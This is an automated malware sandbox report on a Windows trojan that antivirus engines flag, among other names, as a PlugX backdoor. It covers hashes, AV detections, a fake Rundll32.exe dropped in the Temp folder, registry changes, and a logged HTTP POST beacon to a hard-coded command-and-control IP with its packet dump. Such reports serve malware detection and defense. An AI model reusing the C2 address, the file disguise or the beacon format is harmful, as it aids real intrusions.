Analysis Date2014-07-27 19:36:05
MD5810f2d6eccccc5f034f0ee91743c1608
SHA191d34316c33828dd32890f42e586ad24e2e161aa

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: dc1452578c65dcaac780bbdbb897ca15 sha1: 99fa24e38c5b02a471e8e168b8fe7c3a5b528de1 size: 8192
Section.rdata md5: 0feb160c06aa7eaa1f220c8b5d68da02 sha1: 64756d7607af5603ae7685fa7d260eac086602e1 size: 8192
Section.data md5: 955be592113e5f297d40e5afe816d00d sha1: 745a8f6e8fe9f502cf7441b2f30f7034eb584055 size: 4096
Section.rsrc md5: 05983abc1fb5280127ecec76c8cae775 sha1: c91abaf2c7cad9b7c383b56ad29aefbaeedc6b33 size: 86016
Timestamp2014-06-23 09:52:15
VersionLegalCopyright: Copyright (C) 2014
InternalName:
FileVersion: 6.1.7600.16385
CompanyName: Microsoft Corporation. All rights reserved.
PrivateBuild:
LegalTrademarks:
Comments:
ProductName:
SpecialBuild:
ProductVersion: 6, 1, 7600, 16385
FileDescription:
OriginalFilename:
PackerMicrosoft Visual C++ v6.0
PEhash64ca865e23f947b865ff44c5f96a678fe33c8304
IMPhashe769a4099e1d31353febd2a2ce6b58d5
AV360 SafeTrojan.Agent.BDSU
AVAd-AwareTrojan.Agent.BDSU
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)TR/Agent.BDSU
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftno_virus
AVEset (nod32)no_virus
AVFortinetW32/Swisyn.DGDX!tr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.Agent.BDSU
AVGrisoft (avg)Win32/DH{gRKBE0EDYXluHiATFBdmIiM}
AVIkarusno_virus
AVK7no_virus
AVKasperskyTrojan.Win32.Swisyn.dgdx
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security EssentialsBackdoor:Win32/Plugx.A
AVMicroWorld (escan)Trojan.Agent.BDSU
AVNormanwinpe/Agent.BEEXO
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)BScope.Trojan.SvcHorse.01643

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Rundll32.exe
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\3509_appcompat.txt
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 1216 -e 148 -g
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 192
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Rundll32.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Rundll32.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\CLASSES\FAST\CLSID ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexFast
Winsock DNS103.226.127.119

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 192

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1216 -e 148 -g

Network Details:

HTTP POSThttp://103.226.127.119/update?id=00430d48
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
Flows TCP192.168.1.1:1031 ➝ 103.226.127.119:80
Flows TCP192.168.1.1:1031 ➝ 103.226.127.119:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7570 64617465 3f69643d   POST /update?id=
0x00000010 (00016)   30303433 30643438 20485454 502f312e   00430d48 HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   582d5365 7373696f 6e3a2030 0d0a582d   X-Session: 0..X-
0x00000040 (00064)   53746174 75733a20 300d0a58 2d53697a   Status: 0..X-Siz
0x00000050 (00080)   653a2036 31343536 0d0a582d 536e3a20   e: 61456..X-Sn: 
0x00000060 (00096)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000080 (00128)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000090 (00144)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000a0 (00160)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000b0 (00176)   30373237 3b205356 31290d0a 486f7374   0727; SV1)..Host
0x000000c0 (00192)   3a203130 332e3232 362e3132 372e3131   : 103.226.127.11
0x000000d0 (00208)   390d0a43 6f6e7465 6e742d4c 656e6774   9..Content-Lengt
0x000000e0 (00224)   683a2030 0d0a436f 6e6e6563 74696f6e   h: 0..Connection
0x000000f0 (00240)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x00000100 (00256)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000110 (00272)   63616368 650d0a0d 0a                  cache....


Strings
.
.
.

040904b0
6, 1, 7600, 16385
6.1.7600.16385
&About Fast...
About Fast
Cancel
Comments
CompanyName
Copyright (C) 2014
Fast
Fast Version 1.0
FileDescription
FileVersion
InternalName
@jjh
LegalCopyright
LegalTrademarks
Microsoft Corporation. All rights reserved.
MS Sans Serif
OriginalFilename
PrivateBuild
ProductName
ProductVersion
SpecialBuild
StringFileInfo
TODO: Place dialog controls here.
Translation
VarFileInfo
VS_VERSION_INFO
0aLhg~T
)1\13$
1MRphd<'
1Z\EG_g[
2_8u?jjN
2 vnK'
2(yDO9
5^J{tV
6689im
\6DFq/OU
6p|9Y@
;!72s.~
7g~5e#
7|l~f80R
8XU`8k
>9@%}^
:a'2(o
_acmdln
_adjust_fdiv
ADVAPI32.dll
-A	*H^V
aI@m=,(>
#AJnf#u
a:.#O,
AppendMenuA
Ar^/.{B$
a+tnTf
aZ.(vC
b2DkZ	
BaI{pR`j
bCl#Bl
bpT/0/
]btJQ%a
`~b,'zTA
cn{FqE
,cng;r
_controlfp
CopyFileA
CopyIcon
.'cqBAA
CreateFontIndirectA
CreateMutexA
CreateProcessA
]CvF_j@
__CxxFrameHandler
@.data
De`5&Vk
DestroyCursor
d$H?H~
__dllonexit
DrawIcon
E_>39/tDK
 ,e7l 
E`g;dW'
=~Egq(
EnableWindow
_except_handler3
EX-_RP@
FindResourceA
FreeLibrary
FZO(/	k
GDI32.dll
GetClientRect
GetCurrentThreadId
GetCursorPos
GetInputState
GetLastError
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
GetParent
GetProcAddress
GetStartupInfoA
GetStockObject
GetSystemMenu
GetSystemMetrics
GetTempPathA
GetTextExtentPoint32A
GetWindowRect
GetWindowsDirectoryA
[GLRZd
G\YBYD1N
GYn{UsS
) h4>nK
hB *H7u?
>[HwU\
I]8<-_i
Ik?gEL[
InflateRect
_initterm
InvalidateRect
IsIconic
IsWindow
IZ /I-
{J2L<c
J  6h_+;
JjU+Ic<?&
k8/a"=]`n
<#~KBZ
kCNj[d$)
\K+)EKt
Kernel32.dll
KERNEL32.dll
KillTimer
K$z~6p
l'2c1o<
@L	4X-
L$`_^][d
Lg`CfplRe
l{/m/,
=lm2P6
Lmz@}]
LoadCursorA
LoadIconA
LoadLibraryA
LoadResource
LockResource
LoTT,t
L$$Qj<R
|lr?7EG=n
lstrcatA
lstrcpyA
lstrlenA
lX4/N1
$M&/BpAg
_mbsstr
MFC42.DLL
mNc}[}3=
m~nq	rRa
*MO?Fg
MSVCRT.dll
N[}#3FR
ns{FGF
nUg	$)Y
)ny{'Q 
N^ZfE(A
o	B6Jfd
+`o^k8V
[OliNEC
_onexit
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
__p__commode
__p__fmode
pMKPuz
pN0o/'
PostThreadMessageA
PtInRect
QRSSSSS
-qSt5Z
QS	\]Vv
qtcdm:
QWFHG$1
=rCN	}D
`.rdata
RedrawWindow
RegCloseKey
RegOpenKeyExA
RegQueryValueA
ReleaseDC
^RichH
Rundll32.exe
@sc.4N@)
sD@KyI
SendMessageA
__set_app_type
SetCursor
_setmbcp
SetTimer
__setusermatherr
SetWindowLongA
SHELL32.dll
ShellExecuteA
\shell\open\command
SizeofResource
,S;-)jI
S"%->>K
?SKlt	
S}m",QI
sR3["Q
_stricmp
T)0Ez5
!This program cannot be run in DOS mode.
u$E3H/
~uJ	"mZ%-
u-N_%q
uPA8"z
USER32.dll
,$u%Ua`Ny
 v5CVV[
vfQYm=
VirtualAlloc
Vi W!^R
,v@l=A
v(,rh+qp
~VsrlX
W-3F,1
W{am*p?
WinExec
\winhlp32.exe
W{[+.m
+wn@{*
wnt_2|&
/],'>X
x4##j0
X@8JX;
xCJDW]
_XcptFilter
XE&|SS/~
%x;G	13
XW_7?<
]yd]jG
.y)JL+t
Z3zD0=
zoxQ'.
Z]PG>C94
ZQdl\4
Zu~2|h6